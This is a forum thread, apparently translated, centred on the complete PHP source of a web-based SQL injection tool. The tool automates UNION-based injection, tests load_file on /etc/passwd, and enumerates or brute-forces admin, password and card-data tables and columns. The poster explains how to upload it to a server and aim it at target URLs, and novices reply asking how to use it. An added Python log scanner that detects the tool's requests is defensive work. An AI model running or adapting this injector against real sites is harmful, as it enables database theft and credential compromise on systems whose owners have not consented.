[PHP] SQL Injector Web Based

A place for discussion and tutorials on using tools for hacking, security and computer forensics.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tools uploaded by members are not checked by us and may be infected with malware, intentionally or not; we recommend downloading a tool from its original author's source. Anyone starting a thread is expected to include a screenshot of the tool.
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

[PHP] SQL Injector Web Based

Post by shad.hckr » Tue Oct 25, 2011 11:15 pm

[PHP] SQL Injector Web Based

Originally coded by : xsauron@darkc0de
Modified by : Xblack

Source code : http://xblack.biz/code.php?id=19

<html>
<head><title>SQL Injector - Web Version</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
#form {
    text-align:center;
    background-color:#222;
    padding:5px;
}
#error {
    text-align:center;
    background-color:#cc0000;
    padding:5px;
}
</style>
</head>
<body>

<h3>SQL Injector - Web Version - Darkc0de - Xblack</h3>
<form action="" method="POST">
<div id="form">Url : <input type="text" name="url" size="70"> End : <input type="text" name="end" size="3"><br>
<input type="submit" value="inject"><br><br>
Created by : darkc0de | Modified into web version by <a href="http://xblack.biz">Xblack</a> &copy; 2011</div>
</form>
<pre><?php
set_time_limit(0);
if(isset($_POST['url'])) {
    if(empty($_POST['end'])) {
        $end = "--";
    } else {
        $end = $_POST['end'];
    }    
    injector($_POST['url'],$end);
}

function injector($url,$end) {
        if(!preg_match("/darkc0de/", $url)) {
            print "<div id='error'>[?] Example: http://site.com/index.php?id=darkc0de&pg=news</div>\n";
        } else {
        
        switch($end) {
            case '--' :
            $end = '--';
            break;
            case '/*' :
            $end = '/*';
            break;
            default:
            $end = '--';
            break;
        }
        
        print "[-] URL : $url\n";
        print "[%] Trying connect to host...\n";
        if(con_host($url))
        {
            print "[+] Connect to host successful\n";
            print Get_Info($url);
            print "[-] Finding column number...\n";
            print "[-] Testing : ";
            inject_get_column_num($url, $end);
            
        } else {
            print "[!] Connect to host failed\n";
        }}
}
function inject_get_column_num($url, $end) {

    $max = 100;
    $stop = 0;
    
    $rurl = $url;
    
    for($i = 0; $i <= $max; $i++) {
    $word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
    $sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
    print "$i,";
    if(preg_match("/darkc0de:([0-9]+):/i", con_host($sql), $val)) {
        print "\n[+] Found column number: ".$i."\n";
        print "[+] Null Number: ".$val[1]."\n";
        save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
        save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
        
        for($a = 0; $a <= $i; $a++) {
        $col .= "$a,";
         if($a == $val[1]) {
             $col = str_replace($val[1], "darkc0de", $col);
         }
        }
        $real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
        print "[+] URL: ".$real."\n";
        save_log('injector.txt', "[+] URL: ".$real."\r\n");
        sql_info($real);
    }
  }
}
function sql_info($url) {
    
    $table_4 = array(
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_user','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','密� ?','aut','author','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login','login_admin','login_admins','login_user','login_users','logins','logon','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','name','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','用户','obb_profiles','order','orders','parol','partner','partners','passes','password','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwd','pwds','reg_user','reg_users','registered','regu
ser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user','user_admin','user_info','user_list','user_login','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','username','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCa
tegory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name','jos_user','table_user','email','mail','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins'
    );
    
    $column_4 = array(
'user','username','password','passwd','pass','cc_number','id','email','emri','fjalekalimi','pwd','user_name','customers_email_address','customers_password','user_password','name','user_pass','admin_user','admin_password','admin_pass','usern','user_n','users','login','logins','login_user','login_admin','login_username','user_username','user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid','admin_userid','adminusername','admin_username','adminname','admin_name','usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid','userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user','wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria','fjalekalimin','kodi','emer','ime','korisnik','korisnici','user1','administrator','administrator_name','mem_login','login_password','login_pass','login_passwd','login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w','user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin','user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password','memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass','mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username','my_name','my_password','my_email','cvvnumber','about','access','accnt','accnts','account','accounts','admin','adminemail','adminlogin','adminmail','admins','aid','aim','auth','authenticate','authentication','blog','cc_expires','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','config','contact','converge_pass_hash','converge_pass_salt','crack','customer','customers','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e-mail','emailaddress','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group','id_member','images','index','ip_address','last_ip','last_login','lastname','log','login_name','login_pw','loginkey','loginout','logo',
'md5hash','member','member_id','member_login_key','member_name','memberid','membername','members','new','news','nick','number','nummer','pass_hash','passwordsalt','passwort','personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','un','user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword','user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm','userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name','xar_pass'
);
    
    print "[-] Getting sql server information...\n";
    $info = array(
    'User' => 'user()',
    'Database' => 'database()',
    'Version' => 'version()'
    );
    
    $rurl = $url;
    $rurl2 = $url;
    $rurl3 = $url;
    
    $ending = '--';
    
    foreach($info as $get => $val) {
        if(preg_match("/darkc0de:(.*?):darkc0de/", con_host("".str_replace("darkc0de", "".$string."+concat(0x6461726B63306465,0x3a,$val,0x3a,0x6461726B63306465)+", $url).""), $value)) {
            print "[-] $get: $value[1]\n";
            save_log('injector.txt', "[-] $get: $value[1]\r\n");
        }}
        print "[-] Testing load file...\n";
    $load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
    if(preg_match("/root:x:/", con_host($load))) {
        print "[-] w00t w00t, you have permission to load file!\n";
        print "[-] URL: $load\n";
        save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
        save_log('injector.txt', "[-] URL: $load\r\n");
    } else {
        print "[-] No permission to load file :( \n";
    }
            if(preg_match("/darkc0de:5.(.*?):darkc0de/", con_host("".str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,version(),0x3a,0x6461726B63306465)", $url).""), $value)) {
                print "[-] MySQL Server version is : 5.x\n";
                print "[-] Start extract the column and table...\n";
                print "[-] Table : Column\n";
                $url = str_replace("darkc0de", "concat(char(88,98,108,97,99,107,58),count(table_name),char(58,88,98,108,97,99,107))", $url);
                //$url = str_replace($ending, "+from+information_schema.tables+where+table_schema=database()+$ending", $url);
                $url = "$url+from+information_schema.tables+where+table_schema=database()$ending";
                if(preg_match("/Xblack:([0-9]+):Xblack/", con_host($url), $totaltbl)) {
                   print "[+] Total Table Found: ".$totaltbl[1]."\n";
                   save_log('injector.txt', "[+] Total Table Found: ".$totaltbl[1]."\r\n");
                   for($i = 0; $i <= $totaltbl[1]; $i++) {
                  $urlxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))",$rurl2);
                  $urlxx = $urlxx."from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$ending";
                  if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxx), $table_name)) {
                      print "[-] Table: ".$table_name[1]."\n";
                      save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
                    $urlxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),count(column_name),char(58,88,98,108,97,99,107))",$rurl2);
                    $urlxxx = $urlxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+$ending";
                      if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxx), $totalclm)) {
                          print "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
                          save_log('injector.txt', "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
                          for($a = 0; $a <= $totalclm[1]; $a++) {
                            $urlxxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),column_name,char(58,88,98,108,97,99,107))",$rurl3);
                            $urlxxxx = $urlxxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+limit+".$a.",1+$ending";
                              if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxxx), $column_name)) {
                                  print "".$column_name[1].",";
                                  save_log('injector.txt', "".$column_name[1].",");
                             }
                          }
                          print "\n";
                          save_log('injector.txt', "\r\n");
                      }
                  }
                   }
                   
                }

            } else {
                print "[-] MySQL Server version is : 4.x\n";
                print "[-] Start automatic column and table finder...\n";
                print "[-] This may take a few minutes or hours to finish\n";
                foreach($table_4 as $table) {
                    $i++;
                    $url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
                    $url = str_replace($ending, "+from+".$table."+$ending", $url);
                    if(preg_match("/darkc0de/", con_host($url))) {
                        print "[$i] Found Table : $table\n";
                        save_log('injector.txt', "[-] Found Table : $table\r\n");
                        print "[-] Finding column...\n";
                         foreach($column_4 as $column) {
                             $url = str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,$column,0x3a,0x6461726B63306465)", $rurl);
                            $url = str_replace("$ending", "+from+".$table."+$ending", $url);
                            if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
                                print "[-] Found column: $column\n";
                                save_log('injector.txt', "[-] Found column: $column\r\n");
                            }
                         }
                         save_log('injector.txt', "\r\n");
                         print "[-] Done searching column inside $table table\n";
                        
                    }
                }
            }
    print "[-] Done\n";
    print "[-] See 'injector.txt' to see the log\n";
    exit;
}
function HexValue($text) {
     for($i = 0; $i < strlen($text); $i++) {
         $a .= dechex(ord($text[$i]));
     }
     return $a;
}
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]\n";
        print "[-] $server[0]\n";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."\n";
    }
}
function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54');
    
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}
function save_log($fname = '', $text = '') {
    $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
    $write = @fwrite($file, $text, '60000000');
    if($write) {
        return 1;
    } else {
        return 0;
    }
}?>
</body>
</html>
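
For defenders: the requests generated by the script above carry fixed strings (its hex and char() markers, the `1=2 UNION ALL SELECT` probe, the information_schema walk, the load_file test) that can be matched in web server access logs. The following is an added example, not part of the original post or the tool; it assumes the combined log format, and the sample log lines, IPs and paths are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request patterns taken from the posted script, matched after URL-decoding.
SIGNATURES = {
    "marker_hex": re.compile(r"0x6461726b63306465", re.I),   # hex of "darkc0de"
    "marker_char": re.compile(r"char\(88,98,108,97,99,107,58\)", re.I),  # "Xblack:"
    "union_probe": re.compile(r"and\s+1=2\s+union\s+all\s+select", re.I),
    "schema_enum": re.compile(r"from\s+information_schema\.(tables|columns)", re.I),
    "load_file": re.compile(r"load_file\(0x2f6574632f706173737764\)", re.I),  # /etc/passwd
}
# Headers hard-coded in con_host(); real browsers can send them, so context only.
TOOL_UA_FRAGMENT = "Opera Mobi/23.348"
TOOL_REFERER = "http://google.com"

LOG_RE = re.compile(  # Apache/nginx "combined" log format (assumed)
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def classify(line):
    """Return (ip, signature names, tool_headers) or None if the line is unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m["path"])
    hits = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    headers = TOOL_UA_FRAGMENT in m["ua"] and m["ref"] == TOOL_REFERER
    return m["ip"], hits, headers

def scan(lines):
    """Aggregate hits per client IP; clients without a request-line hit are omitted."""
    report = defaultdict(lambda: {"requests": 0, "signatures": set(), "tool_headers": False})
    for parsed in map(classify, lines):
        if not parsed or not parsed[1]:
            continue
        ip, hits, headers = parsed
        report[ip]["requests"] += 1
        report[ip]["signatures"].update(hits)
        report[ip]["tool_headers"] |= headers
    return dict(report)

def _line(ip, path, ref, ua):
    return f'{ip} - - [25/Oct/2011:23:20:01 +0700] "GET {path} HTTP/1.1" 200 512 "{ref}" "{ua}"'
# Constructed sample input: IPs, paths and timestamps are made up.
UA = ("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; "
      "U; en) Presto/2.5.25 Version/10.54")
Q = "/news.php?id=1+AND+1=2+UNION+ALL+SELECT+"
SAMPLE_LOG = [
    _line("203.0.113.7", Q + "concat(0x6461726B63306465,0x3a,0,0x3a)+--", TOOL_REFERER, UA),
    _line("203.0.113.7", Q + "0,concat(char(88,98,108,97,99,107,58),table_name,"
          "char(58,88,98,108,97,99,107))+from+information_schema.tables+--", TOOL_REFERER, UA),
    _line("203.0.113.7", Q + "0,load_file(0x2f6574632f706173737764)+--", TOOL_REFERER, UA),
    _line("198.51.100.20", "/news.php?id=42", TOOL_REFERER, UA),   # benign, same headers
    _line("192.0.2.55", "/item.php?id=1%20and%201%3D2%20union%20all%20select%201,2", "-", "Mozilla/5.0"),
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```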

NoThee
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Post by NoThee » Wed Oct 26, 2011 12:23 am

Bro, I want to ask how to use that code, what do I do with it? I'm confused, I often see PHP code like that but don't know what to do with it...?
Please answer... sorry, newbie

shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Post by shad.hckr » Wed Oct 26, 2011 12:39 am

1. save the code above with a php extension (ex: sqli.php)
2. upload it to a web/shell
3. open it in the browser.
4. enter the link you want to inject (ex: http://domain.com/file.php?var=darkc0de)

NoThee
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Post by NoThee » Wed Oct 26, 2011 12:49 am

How do I upload it to a web/shell...?

shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Post by shad.hckr » Wed Oct 26, 2011 5:07 am

NoThee wrote: How do I upload it to a web/shell...?
Look in the other threads, there are plenty of tutorials.

poni
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [PHP] SQL Injector Web Based

Post by poni » Wed Oct 26, 2011 5:20 am

Cool, Mr. shad
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001

Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: [PHP] SQL Injector Web Based

Post by Digital Cat » Wed Oct 26, 2011 7:29 am

Top notch..

Permission to copy the code, okay..

:D If anyone has already uploaded it..

share the link, please..

In PW right now, PW - comfy position.

yuanryuzaki
Posts: 9
Joined: Thu Nov 10, 2011 4:45 pm

Re: [PHP] SQL Injector Web Based

Post by yuanryuzaki » Fri Nov 11, 2011 1:38 am

I've tried it, bro... and managed to upload it to the web :D

oramelu2
Posts: 3
Joined: Mon Jan 02, 2012 10:52 pm

Re: [PHP] SQL Injector Web Based

Post by oramelu2 » Mon Jan 02, 2012 11:06 pm

Can it be run, and does it work as it should, bro?

googlegirl
Posts: 4
Joined: Thu Jan 05, 2012 7:33 am

Re: [PHP] SQL Injector Web Based

Post by googlegirl » Thu Jan 05, 2012 8:15 am

Sorry, everyone.. I'm new to this... how do I use this SQL, and where can I download SQL injection??
